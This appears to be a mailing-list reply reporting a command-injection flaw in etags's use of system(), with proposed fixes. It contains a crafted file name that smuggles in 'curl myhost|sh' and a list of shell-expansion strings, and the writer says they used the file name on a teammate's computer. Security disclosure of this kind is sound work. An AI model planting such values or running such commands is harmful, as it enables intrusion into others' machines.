&gt; Please understand: etags is a stable program.&nbsp; I'm not interested in<br>&gt; changes that modify its design or implementation in such drastic ways.<br><br>I understand, but not completely agree, stable != security.<br><br>Why use the system() function? This is a lazy, insecure little trick,<br>the exec*(such as execvp) function should be used first. We need<br>execute a command, but we don't need execute a shell script.<br><br>Example a case, In my team, some people like automatically pull new<br>code from code server, and use etags update tags, so I secretly uploaded<br>a new file, the file name is:<br><br>$ touch "';curl myhost|sh #'a.z"<br><br>when he automatically update the tags, I hacking his computer.<br><br>So, I have two suggestions:<br><br>1. don't use system(), unless know what are doing.<br><br>2. escape all dangerous characters, just escaping quotes is not<br>enough, the following characters can perform additional actions:<br><br>"$(ls)"<br>"`ls`"<br>"${SHELL}"<br>"$SHELL"<br><br>I'm writing a new patch to escape dangerous characters, and test.<br><br>Thanks.<br><br><br>